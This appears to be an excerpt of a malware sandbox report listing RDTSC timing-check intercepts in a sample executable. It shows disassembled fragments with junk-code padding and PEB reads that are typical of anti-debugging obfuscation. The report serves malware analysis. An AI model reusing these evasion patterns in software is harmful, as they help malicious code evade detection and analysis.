Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A92430 second address: A9245E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A1h 0x00000007 jg 00007FF4C0501596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF4C05015A1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9245E second address: A92495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FF4C0C3E179h 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FF4C0C3E166h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C21C second address: A8C22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnc 00007FF4C0501596h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C22C second address: A8C248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF4C0C3E173h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C248 second address: A8C24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C24C second address: A8C250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C250 second address: A8C256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C256 second address: A8C260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF4C0C3E166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C260 second address: A8C291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF4C05015A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C050159Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A8C291 second address: A8C295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EF22 second address: A9EF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EF27 second address: A9EF35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EF35 second address: A9EF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EF3B second address: A9EF60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FF4C0C3E16Ch 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EAC7 second address: A9EACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A9EC4D second address: A9EC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA6B85 second address: AA6BA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF4C05015A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA6BA3 second address: AA6BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA6BBB second address: AA6BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF4C0501596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA6BC5 second address: AA6BD9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF4C0C3E166h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA6BD9 second address: AA6BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA5DB1 second address: AA5DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA631C second address: AA6322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA68B4 second address: AA68C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA8692 second address: AA8696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AA8696 second address: AA86A6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF4C0C3E166h 0x00000008 jp 00007FF4C0C3E166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AAB299 second address: AAB2CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF4C050159Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: AACF99 second address: AACF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB001A second address: 4DB0032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C05015A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB0032 second address: 4DB0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB0036 second address: 4DB007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF4C050159Eh 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov ecx, 3F8F6D6Dh 0x00000015 mov ch, 73h 0x00000017 popad 0x00000018 call dword ptr [74E5188Ch] 0x0000001e mov edi, edi 0x00000020 push ebp 0x00000021 mov ebp, esp 0x00000023 push ecx 0x00000024 mov ecx, dword ptr [7FFE0004h] 0x0000002a mov dword ptr [ebp-04h], ecx 0x0000002d cmp ecx, 01000000h 0x00000033 jc 00007FF4C0533075h 0x00000039 mov eax, 7FFE0320h 0x0000003e mov eax, dword ptr [eax] 0x00000040 mul ecx 0x00000042 shrd eax, edx, 00000018h 0x00000046 mov esp, ebp 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov bh, B0h 0x0000004d mov dx, cx 0x00000050 popad 0x00000051 pop ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FF4C05015A5h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB007C second address: 4DB0082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB0082 second address: 4DB0086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60056 second address: 4D6005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6005A second address: 4D6005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6005E second address: 4D60064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60064 second address: 4D6006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6006A second address: 4D6006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6006E second address: 4D60090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF4C05015A7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60090 second address: 4D600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D4h 0x00000005 mov ecx, 3AA58067h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600A5 second address: 4D600A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600A9 second address: 4D600AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600AD second address: 4D600B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600B3 second address: 4D600C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E16Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600C4 second address: 4D600C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D600C8 second address: 4D6010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF4C0C3E173h 0x00000015 jmp 00007FF4C0C3E173h 0x0000001a popfd 0x0000001b mov edi, esi 0x0000001d popad 0x0000001e sub esp, 18h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx edx, cx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6010E second address: 4D60186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007FF4C05015A4h 0x00000010 mov bx, cx 0x00000013 pop ecx 0x00000014 jmp 00007FF4C05015A7h 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FF4C05015A9h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 movzx eax, dx 0x00000025 mov ch, dl 0x00000027 popad 0x00000028 mov ebx, dword ptr [eax+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF4C050159Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60186 second address: 4D6018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60319 second address: 4D6034A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF4C05015A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6034A second address: 4D60367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov dx, si 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D604F6 second address: 4D604FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D604FC second address: 4D60500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60500 second address: 4D60531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007FF4C050159Eh 0x00000016 sbb ax, B838h 0x0000001b jmp 00007FF4C050159Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60531 second address: 4D60537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60537 second address: 4D6053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6053B second address: 4D60565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b jmp 00007FF4C0C3E177h 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60565 second address: 4D6056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 62h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6056C second address: 4D605BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+50h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF4C0C3E16Ah 0x00000015 add ch, 00000028h 0x00000018 jmp 00007FF4C0C3E16Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FF4C0C3E176h 0x00000026 sub si, A688h 0x0000002b jmp 00007FF4C0C3E16Bh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D605BF second address: 4D60623 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF4C05015A8h 0x00000008 sub cx, 08E8h 0x0000000d jmp 00007FF4C050159Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+14h], eax 0x00000019 jmp 00007FF4C05015A6h 0x0000001e mov eax, dword ptr [ebx+54h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF4C05015A7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60623 second address: 4D6063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6063B second address: 4D606E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+58h] 0x00000015 jmp 00007FF4C050159Ah 0x0000001a mov dword ptr [esi+1Ch], eax 0x0000001d pushad 0x0000001e mov esi, edx 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+5Ch] 0x00000024 pushad 0x00000025 jmp 00007FF4C05015A5h 0x0000002a push ecx 0x0000002b jmp 00007FF4C05015A7h 0x00000030 pop esi 0x00000031 popad 0x00000032 mov dword ptr [esi+20h], eax 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FF4C05015A5h 0x0000003c adc ch, FFFFFFE6h 0x0000003f jmp 00007FF4C05015A1h 0x00000044 popfd 0x00000045 popad 0x00000046 mov eax, dword ptr [ebx+60h] 0x00000049 pushad 0x0000004a push ebx 0x0000004b mov ax, 0DA5h 0x0000004f pop ecx 0x00000050 movsx ebx, cx 0x00000053 popad 0x00000054 mov dword ptr [esi+24h], eax 0x00000057 pushad 0x00000058 movsx ebx, cx 0x0000005b popad 0x0000005c mov eax, dword ptr [ebx+64h] 0x0000005f pushad 0x00000060 movzx ecx, dx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D606E9 second address: 4D6072F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d jmp 00007FF4C0C3E170h 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF4C0C3E177h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6072F second address: 4D60735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60735 second address: 4D60739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60739 second address: 4D6081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007FF4C05015A7h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 jmp 00007FF4C05015A6h 0x00000019 mov word ptr [esi+30h], ax 0x0000001d jmp 00007FF4C05015A0h 0x00000022 mov ax, word ptr [ebx+00000088h] 0x00000029 jmp 00007FF4C05015A0h 0x0000002e mov word ptr [esi+32h], ax 0x00000032 pushad 0x00000033 mov eax, 5F10F32Dh 0x00000038 mov ecx, 18369529h 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+0000008Ch] 0x00000044 jmp 00007FF4C05015A4h 0x00000049 mov dword ptr [esi+34h], eax 0x0000004c jmp 00007FF4C05015A0h 0x00000051 mov eax, dword ptr [ebx+18h] 0x00000054 pushad 0x00000055 jmp 00007FF4C050159Eh 0x0000005a pushfd 0x0000005b jmp 00007FF4C05015A2h 0x00000060 or ah, FFFFFF88h 0x00000063 jmp 00007FF4C050159Bh 0x00000068 popfd 0x00000069 popad 0x0000006a mov dword ptr [esi+38h], eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 mov ax, bx 0x00000073 push edx 0x00000074 pop esi 0x00000075 popad 0x00000076 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6081E second address: 4D608BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007FF4C0C3E170h 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 pushad 0x00000015 jmp 00007FF4C0C3E16Eh 0x0000001a pushfd 0x0000001b jmp 00007FF4C0C3E172h 0x00000020 add esi, 61BD83A8h 0x00000026 jmp 00007FF4C0C3E16Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+20h] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FF4C0C3E174h 0x00000037 sub ax, F608h 0x0000003c jmp 00007FF4C0C3E16Bh 0x00000041 popfd 0x00000042 mov bx, si 0x00000045 popad 0x00000046 mov dword ptr [esi+40h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D608BB second address: 4D608CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C050159Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D608CD second address: 4D609A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007FF4C0C3E16Eh 0x00000014 push 00000001h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF4C0C3E16Eh 0x0000001d adc ax, 95F8h 0x00000022 jmp 00007FF4C0C3E16Bh 0x00000027 popfd 0x00000028 jmp 00007FF4C0C3E178h 0x0000002d popad 0x0000002e nop 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FF4C0C3E16Eh 0x00000036 or esi, 17C49F88h 0x0000003c jmp 00007FF4C0C3E16Bh 0x00000041 popfd 0x00000042 pushad 0x00000043 mov cx, F815h 0x00000047 mov esi, 78190091h 0x0000004c popad 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 push edx 0x00000051 pushfd 0x00000052 jmp 00007FF4C0C3E178h 0x00000057 add eax, 6EF23518h 0x0000005d jmp 00007FF4C0C3E16Bh 0x00000062 popfd 0x00000063 pop ecx 0x00000064 mov ax, di 0x00000067 popad 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FF4C0C3E16Eh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60A46 second address: 4D60A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60A4C second address: 4D60A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60A50 second address: 4D60A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 mov ecx, edx 0x00000012 mov ch, bh 0x00000014 popad 0x00000015 popad 0x00000016 test edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF4C05015A6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60A82 second address: 4D60A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
